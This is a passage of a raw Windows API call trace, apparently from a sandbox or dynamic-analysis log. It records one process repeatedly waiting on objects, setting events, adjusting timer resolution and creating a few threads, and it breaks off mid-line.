0x0 [0225.032] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0226.190] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0226.190] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0226.192] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0226.224] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0226.227] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0226.228] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0226.266] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0226.284] SetEvent (hEvent=0x128) returned 1 [0226.284] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0226.287] timeEndPeriod (uPeriod=0x1) returned 0x0 [0226.287] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0227.426] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0227.426] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0227.428] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0227.488] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0227.491] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0227.492] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0227.493] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0227.536] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0227.569] SetEvent (hEvent=0x128) returned 1 [0227.569] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0227.572] timeEndPeriod (uPeriod=0x1) returned 0x0 [0227.572] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0228.632] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0228.632] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0228.633] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0228.677] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0228.678] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0228.680] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0228.682] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0228.720] SetEvent (hEvent=0x128) returned 1 [0228.720] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0228.746] timeEndPeriod (uPeriod=0x1) returned 0x0 [0228.746] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0230.085] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0230.085] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0230.087] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0230.337] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0231.075] SetEvent (hEvent=0x128) returned 1 [0231.075] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0231.312] timeEndPeriod (uPeriod=0x1) returned 0x0 [0231.312] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0231.435] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0231.435] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0231.500] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0231.664] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0231.668] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0231.670] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0231.672] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0231.713] SetEvent (hEvent=0x128) returned 1 [0231.713] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0231.743] timeEndPeriod (uPeriod=0x1) returned 0x0 [0231.743] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0235.086] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0235.086] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0235.088] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0235.267] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0235.382] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0235.383] timeEndPeriod (uPeriod=0x1) returned 0x0 [0235.383] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x102 [0245.384] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xc34e) returned 0x102 [0255.385] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x9c3e) returned 0x0 [0256.636] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0256.637] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.638] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.661] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.668] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.680] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.718] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.811] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.814] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.818] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.818] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.821] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.822] timeEndPeriod (uPeriod=0x1) returned 0x0 [0256.823] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0256.849] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0256.849] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.950] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.990] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0256.996] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.047] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.068] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.074] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.089] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.092] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.094] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.100] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.102] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.104] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.105] timeEndPeriod (uPeriod=0x1) returned 0x0 [0257.105] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0257.524] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0257.525] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.526] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.529] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.531] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.534] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.538] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.654] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.658] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.662] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.682] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.694] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.714] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.719] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.720] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.780] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.791] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.821] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.857] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0257.989] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0258.214] timeEndPeriod (uPeriod=0x1) returned 0x0 [0258.214] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0258.274] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0258.274] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0258.325] timeEndPeriod (uPeriod=0x1) returned 0x0 [0258.325] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0258.718] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0258.718] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0258.858] timeEndPeriod (uPeriod=0x1) returned 0x0 [0258.858] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0258.871] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0258.872] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0258.888] timeEndPeriod (uPeriod=0x1) returned 0x0 [0258.888] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0259.021] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0259.021] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0259.045] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0259.260] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0259.374] timeEndPeriod (uPeriod=0x1) returned 0x0 [0259.374] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0259.498] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0259.498] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0259.532] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0259.540] timeEndPeriod (uPeriod=0x1) returned 0x0 [0259.541] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0259.651] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0259.651] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0259.746] timeEndPeriod (uPeriod=0x1) returned 0x0 [0259.746] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0259.831] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0259.831] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0259.860] timeEndPeriod (uPeriod=0x1) returned 0x0 [0259.860] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0259.943] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0259.943] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0259.985] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.055] timeEndPeriod (uPeriod=0x1) returned 0x0 [0260.055] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0260.141] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0260.141] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.152] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.186] timeEndPeriod (uPeriod=0x1) returned 0x0 [0260.186] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0260.329] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0260.329] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.376] SetEvent (hEvent=0x184) returned 1 [0260.376] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.383] SetEvent (hEvent=0x12c) returned 1 [0260.383] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x127606c0, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x19c [0260.384] CloseHandle (hObject=0x19c) returned 1 [0260.385] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.422] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.446] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x1237a240, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a4 [0260.448] CloseHandle (hObject=0x1a4) returned 1 [0260.448] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.467] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x123646c0, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0260.554] CloseHandle (hObject=0x1ac) returned 1 [0260.554] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x12760b40, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0260.555] CloseHandle (hObject=0x1ac) returned 1 [0260.555] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.647] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.656] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.677] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.681] SetEvent (hEvent=0x1b8) returned 1 [0260.681] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.703] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.707] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.710] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.712] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.714] timeEndPeriod (uPeriod=0x1) returned 0x0 [0260.714] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0260.718] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0260.718] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.833] timeEndPeriod (uPeriod=0x1) returned 0x0 [0260.833] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0260.842] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0260.845] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.852] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.856] timeEndPeriod (uPeriod=0x1) returned 0x0 [0260.856] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0260.858] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0260.858] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0260.973] timeEndPeriod (uPeriod=0x1) returned 0x0 [0260.973] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0261.039] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0261.039] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0261.045] timeEndPeriod (uPeriod=0x1) returned 0x0 [0261.045] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0261.046] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0261.047] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0261.049] timeEndPeriod (uPeriod=0x1) returned 0x0 [0261.049] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0261.056] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0261.056] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0261.063] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0261.247] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0261.343] timeEndPeriod (uPeriod=0x1) returned 0x0 [0261.343] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0261.473] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0261.473] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0261.743] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0261.816] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0261.834] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0261.844] timeEndPeriod (uPeriod=0x1) returned 0x0 [0261.844] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0261.897] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0261.897] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0261.919] timeEndPeriod (uPeriod=0x1) returned 0x0 [0261.919] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0261.984] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0261.984] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0262.097] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0262.131] timeEndPeriod (uPeriod=0x1) returned 0x0 [0262.131] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0262.171] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0262.171] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0262.302] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0262.345] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0262.421] timeEndPeriod (uPeriod=0x1) returned 0x0 [0262.421] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0262.441] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0262.441] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0262.785] timeEndPeriod (uPeriod=0x1) returned 0x0 [0262.785] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0262.932] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0262.932] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0262.986] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0262.994] SetEvent (hEvent=0x1d0) returned 1 [0262.994] SetEvent (hEvent=0x134) returned 1 [0262.994] SetEvent (hEvent=0x104) returned 1 [0262.994] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0263.001] timeEndPeriod (uPeriod=0x1) returned 0x0 [0263.001] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0263.009] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0263.009] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0263.017] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0263.021] timeEndPeriod (uPeriod=0x1) returned 0x0 [0263.022] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0263.032] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0263.032] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0263.070] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0263.081] SetEvent (hEvent=0x14c) returned 1 [0263.081] SetEvent (hEvent=0x1e8) returned 1 [0263.081] SetEvent (hEvent=0x1b8) returned 1 [0263.082] SetEvent (hEvent=0x1b8) returned 1 [0263.115] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0263.151] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0265.034] SetEvent (hEvent=0x1e8) returned 1 [0265.034] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0265.435] timeEndPeriod (uPeriod=0x1) returned 0x0 [0265.435] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0265.524] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0265.524] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0265.590] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0265.641] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0265.662] SetEvent (hEvent=0x21c) returned 1 [0265.663] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0265.789] SetEvent (hEvent=0x21c) returned 1 [0265.789] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0265.902] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0265.976] SetEvent (hEvent=0x220) returned 1 [0265.976] SetEvent (hEvent=0x21c) returned 1 [0265.976] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0266.004] SetEvent (hEvent=0x21c) returned 1 [0266.004] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0266.038] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0266.074] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0266.273] timeEndPeriod (uPeriod=0x1) returned 0x0 [0266.273] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0268.852] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0268.852] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0269.108] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0269.366] SetEvent (hEvent=0x1b8) returned 1 [0269.366] SetEvent (hEvent=0x21c) returned 1 [0269.366] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0269.428] SetEvent (hEvent=0x190) returned 1 [0269.428] SetEvent (hEvent=0x12c) returned 1 [0269.428] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0269.679] SetEvent (hEvent=0x184) returned 1 [0269.681] SetEvent (hEvent=0x220) returned 1 [0269.681] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0269.686] SetEvent (hEvent=0x20c) returned 1 [0269.686] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0269.689] SetEvent (hEvent=0x20c) returned 1 [0269.689] SetEvent (hEvent=0x1f0) returned 1 [0269.689] SetEvent (hEvent=0x1dc) returned 1 [0269.689] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0269.703] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0269.802] SetEvent (hEvent=0x1f0) returned 1 [0269.802] SetEvent (hEvent=0x20c) returned 1 [0269.802] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0269.858] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.038] SetEvent (hEvent=0x1f0) returned 1 [0270.038] SetEvent (hEvent=0x198) returned 1 [0270.038] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.070] timeEndPeriod (uPeriod=0x1) returned 0x0 [0270.070] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0270.094] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0270.095] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.104] timeEndPeriod (uPeriod=0x1) returned 0x0 [0270.104] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0270.153] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0270.154] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.185] timeEndPeriod (uPeriod=0x1) returned 0x0 [0270.185] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0270.193] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0270.193] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.201] timeEndPeriod (uPeriod=0x1) returned 0x0 [0270.201] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0270.224] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0270.224] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.228] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.231] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.258] timeEndPeriod (uPeriod=0x1) returned 0x0 [0270.258] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0270.289] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0270.289] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.313] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.317] timeEndPeriod (uPeriod=0x1) returned 0x0 [0270.318] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0270.433] timeBeginPeriod (uPeriod=0x1) returned 